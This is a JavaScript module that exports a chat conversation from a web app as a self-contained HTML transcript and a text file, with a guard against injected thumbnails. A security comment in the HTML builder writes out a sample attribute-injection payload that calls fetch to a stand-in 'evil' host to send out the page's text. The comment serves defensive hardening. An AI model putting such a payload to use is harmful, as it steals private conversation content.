// src/services/chatExport.js — export a conversation from the browser.
//
// The phone ships a ZIP (chat.html + chat.txt + media/) because it has the
// media on disk and a zip library. A browser has neither: the media is
// encrypted in the cloud and there is no archiver here without pulling in a
// dependency. So the web produces what it can produce honestly —
//
//   • an offline-viewable **HTML transcript**, self-contained: every message
//     type rendered, day separators, sender names and times, with the
//     thumbnails that already live on the message docs embedded as data URIs
//     so the file opens with pictures in it and needs nothing else
//   • a plain-text **.txt** of the same transcript
//
// Both download straight away, and the export is recorded in the shared
// history (services/exportHistory.js) with its real byte size, so the list
// reads the same on the phone.
//
// 🟥 IT EXPORTS WHAT YOU CAN STILL SEE. Deleted, cleared and purged messages
//    are filtered out through the same `isSearchable` gate the search uses —
//    an export that resurrects deleted content would be the worst possible
//    place to get that wrong.

import { isSearchable, classify } from './searchAll';
import { tsMs } from './chats';
import { recordExport } from './exportHistory';

const esc = (s) => String(s ?? '')
  .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
const brk = (s) => esc(s).replace(/\n/g, '<br/>');

const dayKey = (ms) => new Date(ms).toDateString();
const dayLabel = (ms) => new Date(ms).toLocaleDateString(undefined, {
  weekday: 'long', day: 'numeric', month: 'long', year: 'numeric',
});
const timeLabel = (ms) => new Date(ms).toLocaleTimeString(undefined, { hour: '2-digit', minute: '2-digit' });

/** The one-line body an exported row shows for a non-text message. */
function bodyOf(m) {
  const { kind, label, body } = classify(m);
  if (kind === 'messages') return { text: body, tag: null };
  return { text: body && body !== label ? body : '', tag: label };
}

function buildHtml({ chatName, rows, nameOf, myUid, stamp }) {
  let out = '';
  let lastDay = '';
  for (const m of rows) {
    const ms = tsMs(m.timestamp);
    const dk = dayKey(ms);
    if (dk !== lastDay) { out += `<div class="day"><span>${esc(dayLabel(ms))}</span></div>`; lastDay = dk; }

    const mine = m.senderId === myUid;
    const { text, tag } = bodyOf(m);
    const thumb = m.imageThumbnailBase64 || m.videoThumbnailBase64 || (m.batchThumbnails || [])[0];
    const isSys = m.type === 'system' || (m.systemType && m.systemType !== 'group_invite');

    if (isSys) { out += `<div class="sys">${brk(m.text || text)}</div>`; continue; }

    out += `<div class="row ${mine ? 'out' : 'in'}">`;
    out += '<div class="bub">';
    if (!mine) out += `<div class="who">${esc(nameOf(m))}</div>`;
    /* 🟥 `thumb` IS A PEER-WRITABLE MESSAGE FIELD, dropped straight into an
     attribute — and `esc` here does not escape `"` either, so routing it through
     esc would not have saved this. A peer setting imageThumbnailBase64 to
     `x" onerror="fetch('https://evil/'+document.body.innerText)` owns the
     exported file the moment it is opened. Base64 has a fixed alphabet; anything
     outside it is not a thumbnail. */
  const _b64 = /^[A-Za-z0-9+/=]+$/.test(String(thumb || '')) ? String(thumb) : '';
  if (_b64) out += `<img class="thumb" src="data:image/jpeg;base64,${_b64}" alt=""/>`;
    if (tag) out += `<div class="tag">${esc(tag)}</div>`;
    if (text) out += `<div class="txt">${brk(text)}</div>`;
    out += `<div class="time">${esc(timeLabel(ms))}</div>`;
    out += '</div></div>';
  }

  return `<!doctype html>
<html lang="en"><head><meta charset="utf-8"/>
<meta name="viewport" content="width=device-width,initial-scale=1"/>
<title>${esc(chatName)} — Allo export</title>
<style>
  :root { color-scheme: light dark; }
  * { box-sizing: border-box; }
  body { margin:0; padding:28px 16px 60px; background:#f4f6f9; font:15px/1.5 -apple-system,Segoe UI,Roboto,sans-serif; color:#101828; }
  .wrap { max-width: 760px; margin: 0 auto; }
  header { text-align:center; margin-bottom:26px; }
  header h1 { margin:0 0 4px; font-size:21px; }
  header p { margin:0; font-size:12.5px; color:#667085; }
  .day { text-align:center; margin:22px 0 14px; }
  .day span { background:#e4e9f2; color:#475467; font-size:11.5px; font-weight:700; padding:5px 12px; border-radius:999px; }
  .row { display:flex; margin:6px 0; }
  .row.out { justify-content:flex-end; }
  .bub { max-width:74%; background:#fff; border-radius:14px; padding:9px 12px; box-shadow:0 1px 2px rgba(16,24,40,.08); }
  .row.out .bub { background:#d7ebff; }
  .who { font-size:11.5px; font-weight:700; color:#0a84ff; margin-bottom:3px; }
  .txt { white-space:pre-wrap; word-wrap:break-word; }
  .tag { display:inline-block; font-size:10.5px; font-weight:800; text-transform:uppercase; letter-spacing:.4px;
         color:#0a84ff; background:rgba(10,132,255,.12); padding:2px 7px; border-radius:999px; margin-bottom:5px; }
  .thumb { display:block; width:100%; max-width:280px; border-radius:10px; margin-bottom:6px; }
  .time { font-size:10.5px; color:#98a2b3; text-align:right; margin-top:3px; }
  .sys { text-align:center; font-size:12px; color:#667085; margin:12px 0; font-style:italic; }
  footer { text-align:center; margin-top:34px; font-size:11.5px; color:#98a2b3; }
  @media (prefers-color-scheme: dark) {
    body { background:#0f1319; color:#e7ecf3; }
    .bub { background:#1a2029; box-shadow:none; } .row.out .bub { background:#123a63; }
    .day span { background:#1a2029; color:#98a2b3; } .sys, footer, .time { color:#7b8494; }
  }
</style></head><body><div class="wrap">
<header><h1>${esc(chatName)}</h1><p>Exported from Allo · ${esc(stamp.toLocaleString())} · ${rows.length} messages</p></header>
${out}
<footer>End of conversation · exported ${esc(stamp.toLocaleString())}</footer>
</div></body></html>`;
}

function buildTxt({ chatName, rows, nameOf, stamp }) {
  const lines = [`${chatName} — Allo export`, `Exported ${stamp.toLocaleString()} · ${rows.length} messages`, ''];
  let lastDay = '';
  for (const m of rows) {
    const ms = tsMs(m.timestamp);
    const dk = dayKey(ms);
    if (dk !== lastDay) { lines.push('', `— ${dayLabel(ms)} —`, ''); lastDay = dk; }
    const { text, tag } = bodyOf(m);
    const what = [tag ? `[${tag}]` : '', text].filter(Boolean).join(' ');
    lines.push(`[${timeLabel(ms)}] ${nameOf(m)}: ${what}`);
  }
  return lines.join('\n');
}

function saveBlob(text, mime, filename) {
  const blob = new Blob([text], { type: mime });
  const url = URL.createObjectURL(blob);
  const a = document.createElement('a');
  a.href = url; a.download = filename;
  document.body.appendChild(a); a.click(); a.remove();
  setTimeout(() => URL.revokeObjectURL(url), 4000);
  return blob.size;
}

/**
 * Export one chat. Returns { bytes, files, messages }.
 * `msgs` should be the fullest set available (the phone's export + live).
 */
export async function exportChat({ chat, chatName, msgs, myUid, nameOf, formats = ['html', 'txt'] }) {
  const rows = (msgs || [])
    .filter((m) => isSearchable(m, chat, myUid))
    .sort((a, b) => tsMs(a.timestamp) - tsMs(b.timestamp));

  const stamp = new Date();
  const safe = String(chatName || 'chat').replace(/[^\w\- ]+/g, '').trim().slice(0, 40) || 'chat';
  const date = stamp.toISOString().slice(0, 10);
  let bytes = 0; let files = 0;

  if (formats.includes('html')) {
    bytes += saveBlob(
      buildHtml({ chatName, rows, nameOf, myUid, stamp }),
      'text/html;charset=utf-8',
      `Allo-${safe}-${date}.html`,
    );
    files += 1;
  }
  if (formats.includes('txt')) {
    bytes += saveBlob(
      buildTxt({ chatName, rows, nameOf, stamp }),
      'text/plain;charset=utf-8',
      `Allo-${safe}-${date}.txt`,
    );
    files += 1;
  }

  await recordExport(myUid, {
    chatId: chat.id,
    chatName,
    bytes,
    files,
    format: formats.join('+'),
    platform: 'web',
  }).catch(() => {});

  return { bytes, files, messages: rows.length };
}
